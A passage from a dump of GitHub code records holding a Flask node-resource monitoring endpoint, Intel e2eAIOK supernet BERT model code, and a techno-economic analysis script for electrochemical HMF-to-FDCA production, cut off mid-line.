]:\n\n\n\n\n","repo_name":"Hashir-Ansari/Assignment","sub_path":"PIAIC101099_Assignment2.py","file_name":"PIAIC101099_Assignment2.py","file_ext":"py","file_size_in_byte":3168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"21886434843","text":"# USAGE\n# Start the server:\n# \tpython app.py\n# Submit a request via cURL:\n# curl http://localhost:7000/resource\nimport os\nimport time\nimport flask\nimport json\nimport re\n\n\n# /proc/cpuinfo  cpu的信息\ndef cpuinfo():\n info = os.popen(\"cat /proc/cpuinfo\").read().split(\"\\n\")\n result = {}\n for i in range(len(info)):\n if info[i].find(\"\\t: \") == -1:\n continue\n result[info[i].split(\"\\t: \")[0]] = info[i].split(\"\\t: \")[1]\n\n cpu_list = [\n float(result[\"processor\"]),\n float(result[\"cpu MHz\\t\"]),\n float(re.findall(r\"\\d+\\.?\\d*\", result[\"cache size\"])[0]),\n float(result[\"bogomips\"]),\n ]\n return cpu_list\n\n\n# /proc/meminfo   RAM使用的相关信息\ndef meminfo():\n info = os.popen(\"cat /proc/meminfo\").read().split(\"\\n\")\n result = {}\n for i in range(len(info)):\n if info[i].find(\": \") == -1:\n continue\n result[info[i].split(\": \")[0]] = info[i].split(\": \")[1].strip()\n\n mem_list = [\n float(re.findall(r\"\\d+\\.?\\d*\", result[\"MemFree\"])[0]),\n float(re.findall(r\"\\d+\\.?\\d*\", result[\"Cached\"])[0]),\n float(re.findall(r\"\\d+\\.?\\d*\", result[\"Active\"])[0]),\n ]\n return mem_list\n\n\n# /proc/uptime  系统已经运行了多久\ndef uptime():\n info = os.popen(\"cat /proc/uptime\").read().split(\" \")\n # run time,idle time\n result = [float(info[0].strip()), float(info[1].strip())]\n return result\n\n\ndef check_status():\n result = []\n if not os.path.exists(\"./node_status_info/\"):\n os.makedirs(\"./node_status_info/\")\n\n with open(\"./node_status_info/cpu_\" + str(time.time()) + \".json\", \"w\") as file_obj:\n cpu = cpuinfo()\n json.dump(cpu, file_obj)\n result.append(cpu)\n\n with open(\"./node_status_info/mem_\" + str(time.time()) + \".json\", \"w\") as file_obj:\n mem = meminfo()\n json.dump(mem, file_obj)\n result.append(mem)\n\n with open(\n \"./node_status_info/uptime_\" + str(time.time()) + \".json\", \"w\"\n ) as file_obj:\n up_time = uptime()\n json.dump(up_time, file_obj)\n result.append(up_time)\n return result\n\n\n# CPU\nos.environ[\"TF_CPP_MIN_LOG_LEVEL\"] = \"2\"\n\n# initialize our Flask application and the Keras model\napp = flask.Flask(__name__)\n\n\n# 返回:{'cpu':[],'mem':[],'up_time':[]}\n# []中按照顺序依次是需要的几项\n@app.route(\"/resource\", methods=[\"GET\"])\ndef predict():\n if flask.request.method == \"GET\":\n result = check_status()\n return flask.jsonify(result)\n\n\n# if this is the main thread of execution first load the model and\n# then start the server\nif __name__ == \"__main__\":\n app.run(host=\"0.0.0.0\", port=7000, threaded=True)\n","repo_name":"fwyc0573/EdgeCloudSystem","sub_path":"back-end/edge/node_resource/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2703,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"74232897643","text":"from __future__ import absolute_import, division, print_function, unicode_literals\n\nimport logging\nimport sys\nimport os\nimport json\nimport copy\nimport tarfile\nimport tempfile\n\n\nimport torch\nfrom torch import embedding, nn\nfrom torch.nn import CrossEntropyLoss\n\nfrom e2eAIOK.DeNas.module.nlp.Linear_super import LinearSuper as SuperLinear\nfrom e2eAIOK.DeNas.module.nlp.layernorm_super import LayerNormSuper as SuperBertLayerNorm\nfrom e2eAIOK.DeNas.module.nlp.bert_embedding_super import SuperBertEmbeddings\nfrom e2eAIOK.DeNas.module.nlp.bert_encoder_super import SuperBertEncoder\nfrom e2eAIOK.DeNas.module.nlp.bert_pooler_super import SuperBertPooler\n\nlogging.basicConfig(format='%(asctime)s - %(levelname)s - %(name)s - %(message)s',\n datefmt='%m/%d/%Y %H:%M:%S',\n level=logging.INFO)\nlogger = logging.getLogger(__name__)\n\nPRETRAINED_MODEL_ARCHIVE_MAP = {\n 'bert-base-uncased': \"https://s3.amazonaws.com/models.huggingface.co/bert/bert-base-uncased.tar.gz\",\n 'bert-large-uncased': \"https://s3.amazonaws.com/models.huggingface.co/bert/bert-large-uncased.tar.gz\",\n 'bert-base-cased': \"https://s3.amazonaws.com/models.huggingface.co/bert/bert-base-cased.tar.gz\",\n 'bert-large-cased': \"https://s3.amazonaws.com/models.huggingface.co/bert/bert-large-cased.tar.gz\",\n 'bert-base-multilingual-uncased': \"https://s3.amazonaws.com/models.huggingface.co/bert/bert-base-multilingual-uncased.tar.gz\",\n 'bert-base-multilingual-cased': \"https://s3.amazonaws.com/models.huggingface.co/bert/bert-base-multilingual-cased.tar.gz\",\n 'bert-base-chinese': \"https://s3.amazonaws.com/models.huggingface.co/bert/bert-base-chinese.tar.gz\",\n}\nBERT_CONFIG_NAME = 'config.json'\nCONFIG_NAME = \"config.json\"\nWEIGHTS_NAME = \"pytorch_model.bin\"\n\n\nclass BertConfig(object):\n def __init__(self,\n vocab_size_or_config_json_file,\n hidden_size=768,\n num_hidden_layers=12,\n num_attention_heads=12,\n intermediate_size=3072,\n hidden_act=\"gelu\",\n hidden_dropout_prob=0.1,\n attention_probs_dropout_prob=0.1,\n max_position_embeddings=512,\n type_vocab_size=2,\n initializer_range=0.02,\n layer_norm_eps=1e-12):\n if isinstance(vocab_size_or_config_json_file, str) or (sys.version_info[0] == 2\n and isinstance(vocab_size_or_config_json_file, unicode)):\n with open(vocab_size_or_config_json_file, \"r\", encoding='utf-8') as reader:\n json_config = json.loads(reader.read())\n for key, value in json_config.items():\n self.__dict__[key] = value\n elif isinstance(vocab_size_or_config_json_file, int):\n self.vocab_size = vocab_size_or_config_json_file\n self.hidden_size = hidden_size\n self.num_hidden_layers = num_hidden_layers\n self.num_attention_heads = num_attention_heads\n self.hidden_act = hidden_act\n self.intermediate_size = intermediate_size\n self.hidden_dropout_prob = hidden_dropout_prob\n self.attention_probs_dropout_prob = attention_probs_dropout_prob\n self.max_position_embeddings = max_position_embeddings\n self.type_vocab_size = type_vocab_size\n self.initializer_range = initializer_range\n self.layer_norm_eps = layer_norm_eps\n else:\n raise ValueError(\"First argument must be either a vocabulary size (int)\"\n \"or the path to a pretrained model config file (str)\")\n\n @classmethod\n def from_dict(cls, json_object):\n \"\"\"Constructs a `BertConfig` from a Python dictionary of parameters.\"\"\"\n config = BertConfig(vocab_size_or_config_json_file=-1)\n for key, value in json_object.items():\n config.__dict__[key] = value\n return config\n\n @classmethod\n def from_json_file(cls, json_file):\n \"\"\"Constructs a `BertConfig` from a json file of parameters.\"\"\"\n with open(json_file, \"r\", encoding='utf-8') as reader:\n text = reader.read()\n return cls.from_dict(json.loads(text))\n\n @classmethod\n def from_pretrained(cls, pretrained_model_name_or_path, **kwargs):\n return_unused_kwargs = kwargs.pop('return_unused_kwargs', False)\n\n if os.path.isdir(pretrained_model_name_or_path):\n config_file = os.path.join(pretrained_model_name_or_path, CONFIG_NAME)\n else:\n config_file = pretrained_model_name_or_path\n\n # Load config\n config = cls.from_json_file(config_file)\n\n if hasattr(config, 'pruned_heads'):\n config.pruned_heads = dict((int(key), value) for key, value in config.pruned_heads.items())\n\n # Update config with kwargs if needed\n to_remove = []\n for key, value in kwargs.items():\n if hasattr(config, key):\n setattr(config, key, value)\n to_remove.append(key)\n for key in to_remove:\n kwargs.pop(key, None)\n\n logger.info(\"Model config %s\", str(config))\n if return_unused_kwargs:\n return config, kwargs\n else:\n return config\n\n def __repr__(self):\n return str(self.to_json_string())\n\n def to_dict(self):\n \"\"\"Serializes this instance to a Python dictionary.\"\"\"\n output = copy.deepcopy(self.__dict__)\n return output\n\n def to_json_string(self):\n \"\"\"Serializes this instance to a JSON string.\"\"\"\n return json.dumps(self.to_dict(), indent=2, sort_keys=True) + \"\\n\"\n\n def to_json_file(self, json_file_path):\n \"\"\" Save this instance to a json file.\"\"\"\n with open(json_file_path, \"w\", encoding='utf-8') as writer:\n writer.write(self.to_json_string())\n\n\nclass BertPreTrainedModel(nn.Module):\n def __init__(self, config, *inputs, **kwargs):\n super(BertPreTrainedModel, self).__init__()\n if not isinstance(config, BertConfig):\n raise ValueError(\n \"Parameter config in `{}(config)` should be an instance of class `BertConfig`. \"\n \"To create a model from a Google pretrained model use \"\n \"`model = {}.from_pretrained(PRETRAINED_MODEL_NAME)`\".format(\n self.__class__.__name__, self.__class__.__name__\n ))\n self.config = config\n\n def init_bert_weights(self, module):\n \"\"\" Initialize the weights.\n \"\"\"\n if isinstance(module, (nn.Linear, nn.Embedding)):\n # Slightly different from the TF version which uses truncated_normal for initialization\n # cf https://github.com/pytorch/pytorch/pull/5617\n module.weight.data.normal_(mean=0.0, std=self.config.initializer_range)\n elif isinstance(module, SuperBertLayerNorm):\n module.bias.data.zero_()\n module.weight.data.fill_(1.0)\n if isinstance(module, nn.Linear) and module.bias is not None:\n module.bias.data.zero_()\n\n @classmethod\n def from_scratch(cls, pretrained_model_name_or_path, *inputs, **kwargs):\n resolved_config_file = os.path.join(pretrained_model_name_or_path, CONFIG_NAME)\n if not os.path.exists(resolved_config_file):\n resolved_config_file = os.path.join(pretrained_model_name_or_path, BERT_CONFIG_NAME)\n config = BertConfig.from_json_file(resolved_config_file)\n logger.info(\"Model config {}\".format(config))\n model = cls(*inputs, **kwargs)\n return model\n\n @classmethod\n def from_pretrained(cls, pretrained_model_name_or_path, *inputs, **kwargs):\n state_dict = kwargs.get('state_dict', None)\n kwargs.pop('state_dict', None)\n cache_dir = kwargs.get('cache_dir', None)\n kwargs.pop('cache_dir', None)\n from_tf = kwargs.get('from_tf', False)\n kwargs.pop('from_tf', None)\n\n if pretrained_model_name_or_path in PRETRAINED_MODEL_ARCHIVE_MAP:\n archive_file = PRETRAINED_MODEL_ARCHIVE_MAP[pretrained_model_name_or_path]\n else:\n archive_file = pretrained_model_name_or_path\n # redirect to the cache, if necessary\n try:\n resolved_archive_file = archive_file\n cache_dir=cache_dir\n except EnvironmentError:\n logger.error(\n \"Model name was not found in model name list. \"\n \"We assumed 'model_name' was a path or url but couldn't find any file \"\n \"associated to this path or url.\")\n return None\n if resolved_archive_file == archive_file:\n print(\"loading archive file {}\".format(archive_file))\n else:\n print(\"loading archive file {} from cache at {}\".format(\n archive_file, resolved_archive_file))\n tempdir = None\n if os.path.isdir(resolved_archive_file) or from_tf:\n serialization_dir = resolved_archive_file\n else:\n # Extract archive to temp dir\n tempdir = tempfile.mkdtemp()\n print(\"extracting archive file {} to temp dir {}\".format(\n resolved_archive_file, tempdir))\n with tarfile.open(resolved_archive_file, 'r:gz') as archive:\n archive.extractall(tempdir)\n serialization_dir = tempdir\n # Load config\n config_file = os.path.join(serialization_dir, CONFIG_NAME)\n if not os.path.exists(config_file):\n # Backward compatibility with old naming format\n config_file = os.path.join(serialization_dir, BERT_CONFIG_NAME)\n config = BertConfig.from_json_file(config_file)\n logger.info(\"Model config {}\".format(config))\n # Instantiate model.\n model = cls(*inputs, **kwargs)\n if state_dict is None and not from_tf:\n weights_path = os.path.join(serialization_dir, WEIGHTS_NAME)\n state_dict = torch.load(weights_path, map_location='cpu')\n if tempdir:\n # Clean up temp dir\n shutil.rmtree(tempdir)\n # Load from a PyTorch state_dict\n old_keys = []\n new_keys = []\n for key in state_dict.keys():\n new_key = None\n if 'gamma' in key:\n new_key = key.replace('gamma', 'weight')\n if 'beta' in key:\n new_key = key.replace('beta', 'bias')\n if new_key:\n old_keys.append(key)\n new_keys.append(new_key)\n for old_key, new_key in zip(old_keys, new_keys):\n state_dict[new_key] = state_dict.pop(old_key)\n\n old_keys = []\n new_keys = []\n for key in state_dict.keys():\n new_key = None\n\n if 'bert' not in key:\n new_key = 'bert.' + key\n if new_key:\n if 'embedding' in key and 'LayerNorm' not in key and '.embedding.' not in key:\n tmp = new_key.split('.')\n new_key = '.'.join(tmp[:-1]) + '.embedding.' + tmp[-1]\n if 'layer' in key and 'layers' not in key:\n new_key = new_key.replace('layer', 'layers')\n else:\n if 'embedding' in key and 'LayerNorm' not in key and '.embedding.' not in key:\n tmp = key.split('.')\n new_key = '.'.join(tmp[:-1]) + '.embedding.' + tmp[-1]\n if 'layer' in key and 'layers' not in key:\n new_key = key.replace('layer', 'layers')\n if 'qa_outputs' in key:\n new_key = new_key.replace(\"bert.\", \"\")\n if new_key:\n old_keys.append(key)\n new_keys.append(new_key)\n\n for old_key, new_key in zip(old_keys, new_keys):\n state_dict[new_key] = state_dict.pop(old_key)\n\n missing_keys = []\n unexpected_keys = []\n error_msgs = []\n # copy state_dict so _load_from_state_dict can modify it\n metadata = getattr(state_dict, '_metadata', None)\n state_dict = state_dict.copy()\n if metadata is not None:\n state_dict._metadata = metadata\n\n def load(module, prefix=''):\n local_metadata = {} if metadata is None else metadata.get(prefix[:-1], {})\n module._load_from_state_dict(\n state_dict, prefix, local_metadata, True, missing_keys, unexpected_keys, error_msgs)\n for name, child in module._modules.items():\n if child is not None:\n load(child, prefix + name + '.')\n\n start_prefix = ''\n if not hasattr(model, 'bert') and any(s.startswith('bert.') for s in state_dict.keys()):\n start_prefix = 'bert.'\n #print(\"!!!!!model parameters!!!!!\")\n #for param_tensor in model.state_dict():\n # print(param_tensor, \"\\t\", model.state_dict()[param_tensor].size())\n #print(\"!!!!!saved parameters!!!!!\")\n #for param_tensor in state_dict:\n # print(param_tensor, \"\\t\", state_dict[param_tensor].size()) \n #sys.exit()\n \n load(model, prefix=start_prefix)\n #missing_keys, unexpected_keys = model.load_state_dict(state_dict)\n if len(missing_keys) > 0:\n print(\"Weights of {} not initialized from pretrained model: {}\".format(\n model.__class__.__name__, missing_keys))\n if len(unexpected_keys) > 0:\n print(\"Weights from pretrained model not used in {}: {}\".format(\n model.__class__.__name__, unexpected_keys))\n if len(error_msgs) > 0:\n raise RuntimeError('Error(s) in loading state_dict for {}:\\n\\t{}'.format(\n model.__class__.__name__, \"\\n\\t\".join(error_msgs)))\n return model\n\n\nclass SuperBertModel(BertPreTrainedModel):\n def __init__(self, config, fit_size=768):\n super(SuperBertModel, self).__init__(config)\n self.embeddings = SuperBertEmbeddings(config)\n self.encoder = SuperBertEncoder(config)\n self.pooler = SuperBertPooler(config)\n self.dense_fit = SuperLinear(config.hidden_size, fit_size)\n\n self.hidden_size = config.hidden_size\n self.qkv_size = self.hidden_size\n\n try:\n self.qkv_size = config.qkv_size\n except:\n self.qkv_size = config.hidden_size\n\n self.fit_size = fit_size\n self.head_number = config.num_attention_heads\n self.apply(self.init_bert_weights)\n\n def set_sample_config(self, subbert_config):\n self.embeddings.set_sample_config(subbert_config['sample_hidden_size'])\n self.encoder.set_sample_config(subbert_config)\n self.pooler.set_sample_config(subbert_config['sample_hidden_size'])\n\n def calc_sampled_param_num(self):\n emb_numel = self.embeddings.calc_sampled_param_num()\n encoder_numel = self.encoder.calc_sampled_param_num()\n pooler_numel = self.pooler.calc_sampled_param_num()\n\n #logger.info('===========================')\n #logger.info('emb_numel: {}\\n'.format(emb_numel))\n #logger.info('encoder_numel: {}\\n'.format(encoder_numel))\n #logger.info('pooler_numel: {}\\n'.format(pooler_numel))\n #logger.info('all parameters: {}\\n'.format(emb_numel + encoder_numel + pooler_numel))\n #logger.info('===========================')\n return emb_numel + encoder_numel + pooler_numel\n\n def forward(self, input_ids, \n attention_mask=None, token_type_ids=None):\n\n if attention_mask is None:\n attention_mask = torch.ones_like(input_ids)\n if token_type_ids is None:\n token_type_ids = torch.zeros_like(input_ids)\n extended_attention_mask = attention_mask.unsqueeze(1).unsqueeze(2)\n extended_attention_mask = extended_attention_mask.to(dtype=next(self.parameters()).dtype) # fp16 compatibility\n extended_attention_mask = (1.0 - extended_attention_mask) * -10000.0\n \n embedding_output = self.embeddings(input_ids,\n token_type_ids=token_type_ids)\n\n \n all_encoder_layers, all_encoder_att = self.encoder(embedding_output, extended_attention_mask)\n sequence_output = all_encoder_layers[-1]\n pooled_output = self.pooler(sequence_output)\n return all_encoder_layers[-1], pooled_output\n\n\nclass SuperBertForQuestionAnswering(BertPreTrainedModel):\n def __init__(self, config):\n super(SuperBertForQuestionAnswering, self).__init__(config)\n self.bert = SuperBertModel(config)\n self.qa_outputs = SuperLinear(config.hidden_size, 2)\n self.apply(self.init_bert_weights)\n\n def set_sample_config(self, subbert_config):\n self.bert.set_sample_config(subbert_config)\n self.qa_outputs.set_sample_config(subbert_config['sample_hidden_size'], 2)\n\n def calc_sampled_param_num(self):\n return self.bert.calc_sampled_param_num()\n\n def save_pretrained(self, save_directory):\n\n assert os.path.isdir(save_directory), \"Saving path should be a directory where \" \\\n \"the model and configuration can be saved\"\n\n # Only save the model it-self if we are using distributed training\n model_to_save = self.module if hasattr(self, 'module') else self\n\n # Save configuration file\n model_to_save.config.save_pretrained(save_directory)\n\n # If we save using the predefined names, we can load using `from_pretrained`\n output_model_file = os.path.join(save_directory, WEIGHTS_NAME)\n torch.save(model_to_save.state_dict(), output_model_file)\n logger.info(\"Model weights saved in {}\".format(output_model_file))\n\n def forward(self, x):\n\n input_ids, attention_mask, token_type_ids = x.split(1, -1)\n input_ids = input_ids.squeeze(-1)\n attention_mask = attention_mask.squeeze(-1)\n token_type_ids = token_type_ids.squeeze(-1)\n encoded_layers, pooled_output = self.bert(input_ids, \n attention_mask=attention_mask,\n token_type_ids=token_type_ids)\n last_sequence_output = encoded_layers\n \n logits = self.qa_outputs(last_sequence_output)\n start_logits, end_logits = logits.split(1, dim=-1)\n start_logits = start_logits.squeeze(-1)\n end_logits = end_logits.squeeze(-1)\n\n logits = torch.cat((start_logits, end_logits), -1)\n\n return logits\n\n\nclass CrossEntropyQALoss(nn.Module):\n def __init__(self, ignored_index):\n super(CrossEntropyQALoss, self).__init__()\n self.ignored_index = ignored_index\n self.loss = CrossEntropyLoss(ignore_index=ignored_index)\n\n def forward(self, output, target):\n target_s, target_e = torch.split(target, int(target.size()[-1]/2), -1)\n output_s, output_e = torch.split(output, int(output.size()[-1]/2), -1)\n if len(target_s.size()) > 1:\n target_s = target_s.squeeze(-1)\n if len(target_e.size()) > 1:\n target_e = target_e.squeeze(-1)\n if len(output_s.size()) > 1:\n output_s = output_s.squeeze(-1)\n if len(output_e.size()) > 1:\n output_e = output_e.squeeze(-1)\n target_s.clamp_(0, self.ignored_index)\n target_e.clamp_(0, self.ignored_index)\n start_loss = self.loss(output_s, target_s)\n end_loss = self.loss(output_e, target_e)\n cls_loss = (start_loss + end_loss) / 2\n return cls_loss \n\n","repo_name":"intel/e2eAIOK","sub_path":"e2eAIOK/DeNas/nlp/supernet_bert.py","file_name":"supernet_bert.py","file_ext":"py","file_size_in_byte":19589,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"19"} +{"seq_id":"71029157162","text":"import matplotlib.transforms as transforms\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pygal\nimport io\nfrom matplotlib.figure import Figure\nimport io\nfrom matplotlib.backends.backend_svg import FigureCanvasSVG\n\n# _______________________ Inputs _________________________\n# Economic Parameters\nproduct_production = 100000 # [kg/day]\nproduct_price = 1445 # [$/ton]\noperating_time = 350 # [days/year]\nelectricity_price = 0.02 # [$/kWh]\nh2_price = 1.5 # [$/kg]\nwater_price = 0.0054/3.79 # [$/kg]\nhmf_price = 0.9095 # [$/kg]\nelectrolyzer_reference_cost = 920 # [$/m^2]\nincome_tax = 0.389\ninterest_rate = 0.1 # Nominal\nplant_lifetime = 20 # [years]\n\n# Lab Parameters\ncurrent_density = 0.05 # [A/cm^2]\ncell_voltage = 1.4 # [V]\nfaradaic_efficiency = 1\nfdca_yield = 0.98\nelectrolyte_density = 2.13 # [kg/L]\n\n# # Constants\n# product_MW = 156.093 # [g/mol]\n# product_density = 1.6 # [kg/L]\n# hmf_MW = 126.110 # [g/mol]\n# electrons_per_molecule = 6\n\n# # Crystallization Parameters\n# crystal_capcity_scale_factor = 0.7\n# crystal_reference_cost = 159000 # [$]\n# crystal_reference_capacity = 1427000.00 # [kg/day]\n# crystal_reference_power = (7.1 * 1000) / (1427000 / 24) # [kWh/kg]\n\n# # Depreciation\n# dep = [0.10, 0.18, 0.144, 0.1152, 0.0922, 0.0737,\n# 0.0655, 0.0655, 0.0656, 0.0655, 0.0328]\n\n# _______________________ Calculations _________________________\n\n\ndef HMFOR_TEA(product_production: float, product_price: float, operating_time: float,\n electricity_price: float, h2_price: float, water_price: float, hmf_price: float,\n electrolyzer_reference_cost: float, income_tax: float, interest_rate: float, plant_lifetime: float,\n current_density: float, cell_voltage: float, faradaic_efficiency: float, fdca_yield: float, electrolyte_density: float):\n # This function calculates the TEA for the HMF OR reaction\n\n # Constants\n product_MW = 156.093 # [g/mol]\n product_density = 1.6 # [kg/L]\n hmf_MW = 126.110 # [g/mol]\n electrons_per_molecule = 6\n\n # Crystallization Parameters\n crystal_capcity_scale_factor = 0.7\n crystal_reference_cost = 159000 # [$]\n crystal_reference_capacity = 1427000.00 # [kg/day]\n crystal_reference_power = (7.1 * 1000) / (1427000 / 24) # [kWh/kg]\n\n # Depreciation\n dep = [0.10, 0.18, 0.144, 0.1152, 0.0922, 0.0737,\n 0.0655, 0.0655, 0.0656, 0.0655, 0.0328]\n\n # Electrolyzer Banalnce\n current_needed = (product_production / 86400) * (1000 / product_MW) * \\\n electrons_per_molecule * 96485 / faradaic_efficiency # [A]\n electrolyzer_area = current_needed / (current_density * 10 ** 4) # [m^2]\n power_needed = current_needed * cell_voltage / (10 ** 6)\n hmf_needed = (current_needed * faradaic_efficiency * hmf_MW * # [MW]\n 86400 / (electrons_per_molecule * 96485*1000)) / (fdca_yield) # [kd/day]\n\n electrolyte_flow_rate = (\n (product_production / product_density) / 0.1) * electrolyte_density # [kg/day]\n o2_flow_rate = current_needed * 3/2 * \\\n (1-faradaic_efficiency) / (6 * 96485) * \\\n 0.016 * 86400 # [kg/day]\n h2_flow_rate = current_needed * faradaic_efficiency * 3 / 6 / 96485 * 0.002 * 86400\n h2o_inlet_flow_rate = current_needed * \\\n faradaic_efficiency * 6 / 6 / 96485 * \\\n 0.018 * 86400 # [kg/day]\n h2o_outlet_flow_rate = current_needed * \\\n faradaic_efficiency * 4 / 6 / 96485 * \\\n 0.018 * 86400 # [kg/day]\n\n total_liquid_flow_rate = product_production + \\\n electrolyte_flow_rate + \\\n h2o_outlet_flow_rate # [kg/day]\n\n fdca_weight_fraction = product_production / total_liquid_flow_rate\n h2o_electrolyzer_area = current_needed / (2 * 10 ** 4)\n\n # Captial Costs\n\n electrolyzer_captital = electrolyzer_reference_cost * \\\n (electrolyzer_area + h2o_electrolyzer_area) # [$]\n\n crystal_captital = crystal_reference_cost * \\\n (total_liquid_flow_rate /\n crystal_reference_capacity) ** crystal_capcity_scale_factor # [$]\n\n plant_capital = (electrolyzer_captital +\n crystal_captital) * 0.45 / 0.55 # [$]\n\n total_capital = plant_capital + \\\n electrolyzer_captital + crystal_captital # [$]\n\n # Operating Costs\n electricity_operating = power_needed * \\\n electricity_price * 1000 * 24 # [$/day]\n maintenance_operating = (\n crystal_captital + electrolyzer_captital) * 0.025 / operating_time # [$/day]\n crystal_operating = total_liquid_flow_rate * \\\n electricity_price * crystal_reference_power # [$/day]\n hmf_operating = hmf_needed * hmf_price # [$/day]\n water_operating = water_price * h2o_inlet_flow_rate # [$/day]\n total_operating = electricity_operating + maintenance_operating + \\\n crystal_operating + hmf_operating + water_operating # [$/day]\n\n # Income\n product_income = product_production * \\\n product_price / 1000 + h2_flow_rate * h2_price # [$/day]\n annual_profit = (product_income - total_operating) * operating_time\n\n payback_time = total_capital / annual_profit # [years]\n\n # NPV Calculations\n NPV = -total_capital - 0.05 * total_capital\n discount_facor = 1\n\n for i in range(1, int(plant_lifetime) + 1):\n discount_facor = discount_facor / (1 + interest_rate)\n CF = annual_profit * (1-income_tax)\n if i <= len(dep):\n CF += dep[i-1] * total_capital * income_tax\n NPV += CF * discount_facor\n\n annual_op_costs = np.array([electricity_operating, maintenance_operating,\n crystal_operating, water_operating, hmf_operating]) * operating_time\n return([NPV, payback_time, product_income, annual_op_costs, [electrolyzer_captital, crystal_captital, plant_capital]])\n\n\ndef HMFOR_plots(HMFOR_inputs, cd_lower, cd_upper, cv_lower, cv_upper, FE_lower, FE_upper, yield_lower, yield_upper):\n # Generates plots for HMFOR reaction\n\n [NPV_base, payback_time_base, product_income, op_costs,\n cap_costs] = HMFOR_TEA(*HMFOR_inputs)\n\n # ________Pie Charts__________\n\n # Operating Costs\n op_cost_pie = pygal.Pie()\n op_cost_pie.title = 'Annual Operating Cost Breakdown ($)'\n op_cost_pie.add('Electricity', round(op_costs[0], 2))\n op_cost_pie.add('Maintenance', round(op_costs[1], 2))\n op_cost_pie.add('Crystallization', round(op_costs[2], 2))\n op_cost_pie.add('Water', round(op_costs[3], 2))\n op_cost_pie.add('HMF input', round(op_costs[4], 2))\n\n op_cost_pie_data = op_cost_pie.render_data_uri()\n\n # Operating Costs without HMF\n op_cost_pie_no_hmf = pygal.Pie()\n op_cost_pie_no_hmf.title = 'Annual Operating Cost Breakdown Excluding HMF ($)'\n op_cost_pie_no_hmf.add('Electricity', round(op_costs[0], 2))\n op_cost_pie_no_hmf.add('Maintenance', round(op_costs[1], 2))\n op_cost_pie_no_hmf.add('Crystallization', round(op_costs[2], 2))\n op_cost_pie_no_hmf.add('Water', round(op_costs[3], 2))\n\n op_cost_pie_no_hmf_data = op_cost_pie_no_hmf.render_data_uri()\n\n # Capital Costs\n cap_cost_pie = pygal.Pie()\n cap_cost_pie.title = 'Capital Cost Breakdown ($)'\n cap_cost_pie.add('Electrolyzer', round(cap_costs[0], 2))\n cap_cost_pie.add('Crystallizer', round(cap_costs[1], 2))\n cap_cost_pie.add('Balance', round(cap_costs[2], 2))\n\n cap_cost_pie_data = cap_cost_pie.render_data_uri()\n\n # ________Sensitivity Analysis Charts__________\n\n # Set up scenarios (+/- 10%)\n\n sa_vars = ['Electrolyzer Cost', 'Faradaic Efficiency', 'FDCA Yield',\n 'Cell Voltage', 'Current Density', 'HMF Price', 'Electricity Price']\n\n sa_lower_vars = [[0.9*HMFOR_inputs[7], HMFOR_inputs[13], HMFOR_inputs[14], HMFOR_inputs[12],\n HMFOR_inputs[11], HMFOR_inputs[6], HMFOR_inputs[3]],\n\n [HMFOR_inputs[7], 0.9*HMFOR_inputs[13], HMFOR_inputs[14], HMFOR_inputs[12],\n HMFOR_inputs[11], HMFOR_inputs[6], HMFOR_inputs[3]],\n\n [HMFOR_inputs[7], HMFOR_inputs[13], 0.9*HMFOR_inputs[14], HMFOR_inputs[12],\n HMFOR_inputs[11], HMFOR_inputs[6], HMFOR_inputs[3]],\n\n [HMFOR_inputs[7], HMFOR_inputs[13], HMFOR_inputs[14], 0.9*HMFOR_inputs[12],\n HMFOR_inputs[11], HMFOR_inputs[6], HMFOR_inputs[3]],\n\n [HMFOR_inputs[7], HMFOR_inputs[13], HMFOR_inputs[14], HMFOR_inputs[12],\n 0.9*HMFOR_inputs[11], HMFOR_inputs[6], HMFOR_inputs[3]],\n\n [HMFOR_inputs[7], HMFOR_inputs[13], HMFOR_inputs[14], HMFOR_inputs[12],\n HMFOR_inputs[11], 0.9*HMFOR_inputs[6], HMFOR_inputs[3]],\n\n [HMFOR_inputs[7], HMFOR_inputs[13], HMFOR_inputs[14], HMFOR_inputs[12],\n HMFOR_inputs[11], HMFOR_inputs[6], 0.9*HMFOR_inputs[3]],\n ]\n\n sa_upper_vars = [[1.1*HMFOR_inputs[7], HMFOR_inputs[13], HMFOR_inputs[14], HMFOR_inputs[12],\n HMFOR_inputs[11], HMFOR_inputs[6], HMFOR_inputs[3]],\n\n [HMFOR_inputs[7], 1.1*HMFOR_inputs[13], HMFOR_inputs[14], HMFOR_inputs[12],\n HMFOR_inputs[11], HMFOR_inputs[6], HMFOR_inputs[3]],\n\n [HMFOR_inputs[7], HMFOR_inputs[13], 1.1*HMFOR_inputs[14], HMFOR_inputs[12],\n HMFOR_inputs[11], HMFOR_inputs[6], HMFOR_inputs[3]],\n\n [HMFOR_inputs[7], HMFOR_inputs[13], HMFOR_inputs[14], 1.1*HMFOR_inputs[12],\n HMFOR_inputs[11], HMFOR_inputs[6], HMFOR_inputs[3]],\n\n [HMFOR_inputs[7], HMFOR_inputs[13], HMFOR_inputs[14], HMFOR_inputs[12],\n 1.1*HMFOR_inputs[11], HMFOR_inputs[6], HMFOR_inputs[3]],\n\n [HMFOR_inputs[7], HMFOR_inputs[13], HMFOR_inputs[14], HMFOR_inputs[12],\n HMFOR_inputs[11], 1.1*HMFOR_inputs[6], HMFOR_inputs[3]],\n\n [HMFOR_inputs[7], HMFOR_inputs[13], HMFOR_inputs[14], HMFOR_inputs[12],\n HMFOR_inputs[11], HMFOR_inputs[6], 1.1*HMFOR_inputs[3]],\n ]\n\n sa_lower = []\n for i in range(0, len(sa_lower_vars)):\n results = HMFOR_TEA(*HMFOR_inputs[:3], sa_lower_vars[i][6], *HMFOR_inputs[4:6], sa_lower_vars[i][5], sa_lower_vars[i][0],\n *HMFOR_inputs[8:11], sa_lower_vars[i][4], sa_lower_vars[i][3], sa_lower_vars[i][1], sa_lower_vars[i][2], HMFOR_inputs[-1])\n sa_lower.append(results[0] / NPV_base-1)\n\n sa_upper = []\n for i in range(0, len(sa_upper_vars)):\n results = HMFOR_TEA(*HMFOR_inputs[:3], sa_upper_vars[i][6], *HMFOR_inputs[4:6], sa_upper_vars[i][5], sa_upper_vars[i][0],\n *HMFOR_inputs[8:11], sa_upper_vars[i][4], sa_upper_vars[i][3], sa_upper_vars[i][1], sa_upper_vars[i][2], 